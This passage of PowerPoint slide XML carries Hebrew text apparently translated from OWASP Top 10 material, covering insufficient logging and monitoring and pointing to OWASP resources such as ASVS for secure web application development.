                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>דרך מסויימת לבירור האם קיים ניטור ברמה מספקת הינה לבחון את קבצי הניטור לאחר ביצוע בדיקת חוסן. פעולות הבודקים אמורות להיות מתועדות בצורה נאותה על-מנת להבין איזה נזק עשוי היה להיגרם.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>מרבית המתקפות המוצלחות מתחילות באיתור חולשות. במידה ומאפשרים לכלי בדיקה כאלו להמשיך</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ולפעול, עשוי להגדיל את הסבירות לניצול חולשה מוצלח בכמעט 100%.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>בשנת 2016, איתור מתקפה לקח בממוצע </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId17"/>
                        </a:rPr>
                        <a:t>191 ימים</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> – זמן מספיק לגרימת נזק.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custData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18"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1164910725"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="8147362"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="578558">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>יישם והשתמש בתהליכי אבטחת מידע מחזוריים ובבקרות סטנדרטיות של אבטחת מידע</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr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xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="7568242">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>במידה ואתם חדשים לנושא אבטחת יישומי </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> או שאתם מכירים לעומק סיכונים אלו, המשימה של יצירת יישום </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> מאובטח או טיפול בעיות קיימות עשויה להיות מורכבת. במידה ואתם מנהלים פורטפוליו גדול של יישומים, המשימה עשויה להיות קשה מאוד.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>על-מנת לסייע לארגונים ומפתחים להקטין את סיכוני הפיתוח של יישומים באופן חסכוני ויעיל, ארגון </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> יצרה מספר לא מבוטל של מקורות מידע </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" u="sng" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>חינמיים וחופשיים</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" u="none" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>אשר אתם יכולים להשתמש בהם לטיפול בבעיית אבטחה בפיתוח בארגונים שלכם. להלן מקצת ממקורות המידע שארגון </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ייצר על-מנת לסייע לארגונים לפתח יישומים וממשקי פיתוח (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>APIs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>) בצורה מאובטחת. בעמוד הבא, אנו מציגים מקורות נוספים של </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> אשר עשויים לסייע לארגונים לוודא את רמת האבטחה של היישומים וממשקי הפיתוח (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>APIs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>) שלהם.</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000" baseline="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000" baseline="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000" baseline="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000" baseline="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000" baseline="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000" baseline="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000" baseline="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000" baseline="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000" baseline="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000" baseline="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000" baseline="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000" baseline="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000" baseline="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000" baseline="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000" baseline="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000" baseline="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000" baseline="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000" baseline="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000" baseline="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000" baseline="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000" baseline="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000" baseline="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000" baseline="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000" baseline="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000" baseline="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000" baseline="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000" baseline="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000" baseline="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000" baseline="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000" baseline="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000" baseline="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000" baseline="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000" baseline="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000" baseline="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000" baseline="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900" baseline="0" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>קיימים מספר רב של מקורות מידע של </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> הזמינים לשימוש. בקר ב-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Projects page</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, אשר מציג את כל ה-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>flagship</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, מעבדות, פרוייקטים בשלבים מוקדמים כחלק ממאגר הפרוייקטים של </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. מרבית מקורות </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> זמינים ב-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>wiki</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ומסמכים רבים של </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ניתנים להזמנה בעותק </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>מודפס או דיגיטלי</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcP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xmlns="" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-891480" y="2895600"/>
            <a:ext cx="8763000" cy="5029200"/>
            <a:chOff x="-914400" y="2895600"/>
            <a:chExt cx="8763000" cy="5029200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Rectangle 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-914400" y="2895600"/>
              <a:ext cx="8763000" cy="5029200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="205944" y="2994441"/>
              <a:ext cx="5608321" cy="773044"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="95000"/>
                <a:alpha val="90000"/>
              </a:schemeClr>
            </a:solidFill>
          </p:spPr>
          <p:style>
            <a:lnRef idx="1">
              <a:schemeClr val="accent4">
                <a:alpha val="90000"/>
                <a:tint val="40000"/>
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:lnRef>
            <a:fillRef idx="1">
              <a:scrgbClr r="0" g="0" b="0"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:schemeClr val="accent4">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247651" tIns="161562" rIns="285387" bIns="161563" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="1" algn="r" defTabSz="444500" rtl="1">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="he-IL" sz="900" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>על-מנת</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="900" kern="1200" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> לפתח יישומי </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>web</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="900" kern="1200" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="900" u="sng" kern="1200" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>בצורה מאובטחת</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="900" kern="1200" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>, עליך להגדיר מה נחשב פיתוח מאובטח.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="1" algn="r" defTabSz="444500" rtl="1">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>ארגון </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>OWASP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> ממליץ</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> להשתמש במסמך </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId7"/>
                </a:rPr>
                <a:t>Application Security Verification Standard (ASVS)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> כמדריך להגדרת דרישות אבטחת מידע לפיתוח יישומים. במידה ואת מבצע מיקור חוץ, שקול להשתמש במסמך </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId8"/>
                </a:rPr>
                <a:t>OWASP Secure Software Contract </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
